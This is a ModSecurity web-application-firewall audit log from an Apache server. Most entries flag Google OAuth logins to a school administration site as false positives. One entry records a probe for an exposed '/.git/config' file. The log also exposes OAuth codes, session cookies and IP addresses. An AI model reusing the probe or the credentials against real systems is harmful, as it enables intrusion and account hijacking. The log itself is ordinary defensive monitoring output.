Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHBWVooLYw4or2LgWLO_QAAAMM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334105175799 462310 (- - -) Stopwatch2: 1753334105175799 462310; combined=4909, p1=543, p2=3924, p3=209, p4=76, p5=156, sr=163, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --61e4b06f-Z-- --7f102102-A-- [24/Jul/2025:08:16:07.917437 +0300] aIHBl1ooLYw4or2LgWLRaQAAAMg 212.28.242.186 42078 127.0.0.1 7081 --7f102102-B-- GET /administration/index.php?code=4/0AVMBsJgYvVtO-A7bWVJm6jPmsBPDNlPjtgI3YlX_dJUmfT2V8_7VaOVEYKgLTVnsOrcDIw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=vcssc934i4vhgfu8vs74t6is75 --7f102102-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --7f102102-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHBl1ooLYw4or2LgWLRaQAAAMg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334167460421 457284 (- - -) Stopwatch2: 1753334167460421 457284; combined=5266, p1=799, p2=4117, p3=154, p4=64, p5=131, sr=236, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7f102102-Z-- --6f3b031f-A-- [24/Jul/2025:08:17:18.309890 +0300] aIHB3VooLYw4or2LgWLT5AAAANM 141.105.87.197 36740 127.0.0.1 7081 --6f3b031f-B-- GET /administration/index.php?code=4/0AVMBsJgoG_dXXpD-NQxA4cPGZBUIZhrLyYTghksgPJNXkchMJ-uC8HwiBQneqsawreULxQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=fl51e5631vfrh1ktf7rf824hk3 --6f3b031f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --6f3b031f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHB3VooLYw4or2LgWLT5AAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334237869188 440901 (- - -) Stopwatch2: 1753334237869188 440901; combined=4514, p1=606, p2=3597, p3=134, p4=58, p5=119, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f3b031f-Z-- --75338d7c-A-- [24/Jul/2025:08:20:00.715199 +0300] aIHCe1ooLYw4or2LgWLYLwAAAMI 212.28.242.186 55698 127.0.0.1 7081 --75338d7c-B-- GET /faculty/onlineClasses.php?code=4/0AVMBsJglD9kjjudZITe1m6gfz4gR13xLCPWRBHYLjy5sNaSLtPho-00_Tc6Aibfnd0FjjQ&scope=email%20profile%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/gmail.readonly%20https://www.googleapis.com/auth/calendar.readonly%20https://www.googleapis.com/auth/classroom.courses.readonly%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=isa1eplerkctc9a65j88attvd1 --75338d7c-F-- HTTP/1.1 200 OK Expires: Mon, 16 Jul 1981 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 7894 Content-Type: text/html; charset=UTF-8 --75338d7c-E-- --75338d7c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/faculty/onlineClasses.php"] [unique_id "aIHCe1ooLYw4or2LgWLYLwAAAMI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334395626323 5089091 (- - -) Stopwatch2: 1753334395626323 5089091; combined=8989, p1=659, p2=7922, p3=233, p4=71, p5=103, sr=148, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75338d7c-Z-- --83a87915-A-- [24/Jul/2025:08:21:02.413600 +0300] aIHCvkdutIOpb_kg22gbrAAAAAo 141.105.87.197 38380 127.0.0.1 7081 --83a87915-B-- GET /administration/index.php?code=4/0AVMBsJg8cY136zmKVaSlVYVuVRyj-HUJjhVZCyzCZw6dhii9Q_fTykj0084wcZjbre53pg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=p69scg0q2tvstvgi27t4bjrs36 --83a87915-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --83a87915-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHCvkdutIOpb_kg22gbrAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334462123483 290341 (- - -) Stopwatch2: 1753334462123483 290341; combined=8111, p1=653, p2=7114, p3=155, p4=62, p5=126, sr=169, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83a87915-Z-- --194e2765-A-- [24/Jul/2025:08:21:48.088168 +0300] aIHC61ooLYw4or2LgWLcGAAAANA 212.28.242.186 55400 127.0.0.1 7081 --194e2765-B-- GET /administration/index.php?code=4/0AVMBsJjZ_mEFU-vXjzzA7WNcU9FYh4Hk44IEA1FGl5vkLm7EQQXKNrDdUnpzi2KNg6KRig&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 cookie: PHPSESSID=6p2icar43i6n7g6r9r7bufddt0 --194e2765-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --194e2765-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHC61ooLYw4or2LgWLcGAAAANA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334507680170 408159 (- - -) Stopwatch2: 1753334507680170 408159; combined=4454, p1=686, p2=3333, p3=202, p4=106, p5=126, sr=167, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --194e2765-Z-- --52afa553-A-- [24/Jul/2025:08:22:39.344260 +0300] aIHDH1ooLYw4or2LgWLd5QAAANM 212.28.242.186 56946 127.0.0.1 7081 --52afa553-B-- GET /administration/index.php?code=4/0Adeu5BWJqp0VhuiwaNY5tIfRjaU_6zwyaG074BAPKoHkGkxup5c7VMiqllW_q4NRVOOSgA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: none sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i --52afa553-F-- HTTP/1.1 302 Moved Temporarily Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=eaenpq416bl9vgh67osp61u120; path=/ Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.jinansystem.com/login.php Content-Length: 0 Content-Type: text/html; charset=UTF-8 --52afa553-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHDH1ooLYw4or2LgWLd5QAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334559335433 9044 (- - -) Stopwatch2: 1753334559335433 9044; combined=4669, p1=688, p2=3779, p3=77, p4=38, p5=87, sr=216, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52afa553-Z-- --ecc7ec39-A-- [24/Jul/2025:08:22:46.200687 +0300] aIHDJlooLYw4or2LgWLd-QAAANU 185.177.72.24 40330 127.0.0.1 7081 --ecc7ec39-B-- GET /.git/config HTTP/1.0 Host: raqmix.cloud X-Real-IP: 185.177.72.24 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) Accept-Charset: utf-8 Accept-Encoding: gzip --ecc7ec39-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 15:42:45 GMT ETag: "328-62a6a8c186eb7" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --ecc7ec39-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "raqmix.cloud"] [uri "/.git/config"] [unique_id "aIHDJlooLYw4or2LgWLd-QAAANU"] Stopwatch: 1753334566196838 3916 (- - -) Stopwatch2: 1753334566196838 3916; combined=2224, p1=542, p2=1616, p3=0, p4=0, p5=66, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ecc7ec39-Z-- --dbec575e-A-- [24/Jul/2025:08:22:53.361424 +0300] aIHDLFooLYw4or2LgWLeEQAAANA 212.28.242.186 49148 127.0.0.1 7081 --dbec575e-B-- GET /administration/index.php?code=4/0AVMBsJgHfLqHdiEU8-KMp38MxcH_2MFNnYMrJsSi1V07mdCBPZ83oJvgMhD85tzU7Hm1mQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=eaenpq416bl9vgh67osp61u120 --dbec575e-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --dbec575e-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHDLFooLYw4or2LgWLeEQAAANA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334572940114 421494 (- - -) Stopwatch2: 1753334572940114 421494; combined=5140, p1=636, p2=4158, p3=140, p4=65, p5=140, sr=183, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 